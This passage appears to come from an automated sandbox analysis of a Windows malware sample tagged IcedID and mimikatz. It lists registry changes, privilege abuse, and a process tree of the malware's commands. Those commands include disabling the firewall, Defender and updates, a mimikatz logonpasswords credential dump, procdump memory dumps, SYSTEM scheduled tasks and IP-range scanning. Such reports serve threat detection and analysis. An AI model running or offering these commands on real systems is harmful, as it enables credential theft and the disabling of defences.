mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ncnrnqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mtlvznziz.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ ncnrnqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ ncnrnqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" ncnrnqz.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4996 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4740 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeDebugPrivilege 4740 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4576 ncnrnqz.exe Token: SeDebugPrivilege 2524 ncnrnqz.exe Token: SeDebugPrivilege 3016 vfshost.exe Token: SeDebugPrivilege 3340 mtlvznziz.exe Token: SeLockMemoryPrivilege 4168 jrvvrz.exe Token: SeLockMemoryPrivilege 4168 jrvvrz.exe Token: SeDebugPrivilege 2416 mtlvznziz.exe Token: SeDebugPrivilege 4156 mtlvznziz.exe Token: SeDebugPrivilege 2296 mtlvznziz.exe Token: SeDebugPrivilege 4256 mtlvznziz.exe Token: SeDebugPrivilege 3584 mtlvznziz.exe Token: SeDebugPrivilege 4428 mtlvznziz.exe Token: SeDebugPrivilege 3064 mtlvznziz.exe Token: SeDebugPrivilege 4892 mtlvznziz.exe Token: SeDebugPrivilege 1056 mtlvznziz.exe Token: SeDebugPrivilege 4532 mtlvznziz.exe Token: SeDebugPrivilege 3228 mtlvznziz.exe Token: SeDebugPrivilege 4052 mtlvznziz.exe Token: SeDebugPrivilege 2704 mtlvznziz.exe Token: SeDebugPrivilege 3028 mtlvznziz.exe Token: SeDebugPrivilege 4260 mtlvznziz.exe Token: SeDebugPrivilege 4776 mtlvznziz.exe Token: SeDebugPrivilege 4728 mtlvznziz.exe Token: SeDebugPrivilege 6344 mtlvznziz.exe Token: SeDebugPrivilege 3324 mtlvznziz.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4740 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe 4740 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe 4576 ncnrnqz.exe 4576 ncnrnqz.exe 2524 ncnrnqz.exe 2524 ncnrnqz.exe 3792 xohudmc.exe 2008 yqiwma.exe 4620 ncnrnqz.exe 4620 ncnrnqz.exe 6356 ncnrnqz.exe 6356 ncnrnqz.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4740 wrote to memory of 4784 4740 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe 90 PID 4740 wrote to memory of 4784 4740 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe 90 PID 4740 wrote to memory of 4784 4740 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe 90 PID 4784 wrote to memory of 4996 4784 cmd.exe 92 PID 4784 wrote to memory of 4996 4784 cmd.exe 92 PID 4784 wrote to memory of 4996 4784 cmd.exe 92 PID 4784 wrote to memory of 4576 4784 cmd.exe 104 PID 4784 wrote to memory of 4576 4784 cmd.exe 104 PID 4784 wrote to memory of 4576 4784 cmd.exe 104 PID 2524 wrote to memory of 4960 2524 ncnrnqz.exe 106 PID 2524 wrote to memory of 4960 2524 ncnrnqz.exe 106 PID 2524 wrote to memory of 4960 2524 ncnrnqz.exe 106 PID 4960 wrote to memory of 4516 4960 cmd.exe 108 PID 4960 wrote to memory of 4516 4960 cmd.exe 108 PID 4960 wrote to memory of 4516 4960 cmd.exe 108 PID 4960 wrote to memory of 4260 4960 cmd.exe 109 PID 4960 wrote to memory of 4260 4960 cmd.exe 109 PID 4960 wrote to memory of 4260 4960 cmd.exe 109 PID 4960 wrote to memory of 1004 4960 cmd.exe 110 PID 4960 wrote to memory of 1004 4960 cmd.exe 110 PID 4960 wrote to memory of 1004 4960 cmd.exe 110 PID 4960 wrote to memory of 4356 4960 cmd.exe 111 PID 4960 wrote to memory of 4356 4960 cmd.exe 111 PID 4960 wrote to memory of 4356 4960 cmd.exe 111 PID 4960 wrote to memory of 1660 4960 cmd.exe 112 PID 4960 wrote to memory of 1660 4960 cmd.exe 112 PID 4960 wrote to memory of 1660 4960 cmd.exe 112 PID 4960 wrote to memory of 1488 4960 cmd.exe 113 PID 4960 wrote to memory of 1488 4960 cmd.exe 113 PID 4960 wrote to memory of 1488 4960 cmd.exe 113 PID 2524 wrote to memory of 4740 2524 ncnrnqz.exe 114 PID 2524 wrote to memory of 4740 2524 ncnrnqz.exe 114 PID 2524 wrote to memory of 4740 2524 ncnrnqz.exe 114 PID 2524 wrote to memory of 4052 2524 ncnrnqz.exe 116 PID 2524 wrote to memory of 4052 2524 ncnrnqz.exe 116 PID 2524 wrote to memory of 4052 2524 ncnrnqz.exe 116 PID 2524 wrote to memory of 1140 2524 ncnrnqz.exe 118 PID 2524 wrote to memory of 1140 2524 ncnrnqz.exe 118 PID 2524 wrote to memory of 1140 2524 ncnrnqz.exe 118 PID 2524 wrote to memory of 1084 2524 ncnrnqz.exe 124 PID 2524 wrote to memory of 1084 2524 ncnrnqz.exe 124 PID 2524 wrote to memory of 1084 2524 ncnrnqz.exe 124 PID 1084 wrote to memory of 3016 1084 cmd.exe 126 PID 1084 wrote to memory of 3016 1084 cmd.exe 126 PID 1084 wrote to memory of 3016 1084 cmd.exe 126 PID 3016 wrote to memory of 4020 3016 wpcap.exe 127 PID 3016 wrote to memory of 4020 3016 wpcap.exe 127 PID 3016 wrote to memory of 4020 3016 wpcap.exe 127 PID 4020 wrote to memory of 5028 4020 net.exe 129 PID 4020 wrote to memory of 5028 4020 net.exe 129 PID 4020 wrote to memory of 5028 4020 net.exe 129 PID 3016 wrote to memory of 840 3016 wpcap.exe 130 PID 3016 wrote to memory of 840 3016 wpcap.exe 130 PID 3016 wrote to memory of 840 3016 wpcap.exe 130 PID 840 wrote to memory of 4704 840 net.exe 132 PID 840 wrote to memory of 4704 840 net.exe 132 PID 840 wrote to memory of 4704 840 net.exe 132 PID 3016 wrote to memory of 4324 3016 wpcap.exe 133 PID 3016 wrote to memory of 4324 3016 wpcap.exe 133 PID 3016 wrote to memory of 4324 3016 wpcap.exe 133 PID 4324 wrote to memory of 2968 4324 net.exe 135 PID 4324 wrote to memory of 2968 4324 net.exe 135 PID 4324 wrote to memory of 2968 4324 net.exe 135 PID 3016 wrote to memory of 1416 3016 wpcap.exe 136
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2140
-
C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe"C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kvialcmr\ncnrnqz.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4996
-
-
C:\Windows\kvialcmr\ncnrnqz.exeC:\Windows\kvialcmr\ncnrnqz.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4576
-
-
-
C:\Windows\kvialcmr\ncnrnqz.exeC:\Windows\kvialcmr\ncnrnqz.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4516
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1004
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1660
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1488
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4740
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:4052
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:1140
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exeC:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:5028
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4704
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2968
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3980
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4776
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2572
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4128
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ctvlnlili\rzvrtrlue\Scant.txt2⤵PID:4348
-
C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exeC:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ctvlnlili\rzvrtrlue\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ctvlnlili\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ctvlnlili\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2416 -
C:\Windows\ctvlnlili\Corporate\vfshost.exeC:\Windows\ctvlnlili\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "sviaigimi" /ru system /tr "cmd /c C:\Windows\ime\ncnrnqz.exe"2⤵PID:4520
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "sviaigimi" /ru system /tr "cmd /c C:\Windows\ime\ncnrnqz.exe"3⤵
- Creates scheduled task(s)
PID:3040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lcerrlzzb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F"2⤵PID:664
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lcerrlzzb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:3372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "krzieamit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F"2⤵PID:3472
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "krzieamit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4456
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:1080
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:3204
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:1984
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4740
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:3292
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:3260
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4784
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4312
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:1552
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:3284
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3592
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2608
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:424
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:4324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:4752
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:840
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:2316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:4364
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4128
-
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 792 C:\Windows\TEMP\ctvlnlili\792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:4300
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:1884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:2340
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:4648
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:1488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4272
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4784
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:4552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:2808
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:4456
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:1660
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4352
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2196
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:2160
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:1924
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:3792
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 332 C:\Windows\TEMP\ctvlnlili\332.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2140 C:\Windows\TEMP\ctvlnlili\2140.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2552 C:\Windows\TEMP\ctvlnlili\2552.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2664 C:\Windows\TEMP\ctvlnlili\2664.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2828 C:\Windows\TEMP\ctvlnlili\2828.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3144 C:\Windows\TEMP\ctvlnlili\3144.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3872 C:\Windows\TEMP\ctvlnlili\3872.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3956 C:\Windows\TEMP\ctvlnlili\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 4028 C:\Windows\TEMP\ctvlnlili\4028.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 648 C:\Windows\TEMP\ctvlnlili\648.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 5012 C:\Windows\TEMP\ctvlnlili\5012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 1652 C:\Windows\TEMP\ctvlnlili\1652.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 1260 C:\Windows\TEMP\ctvlnlili\1260.dmp2⤵
- Executes dropped EXE
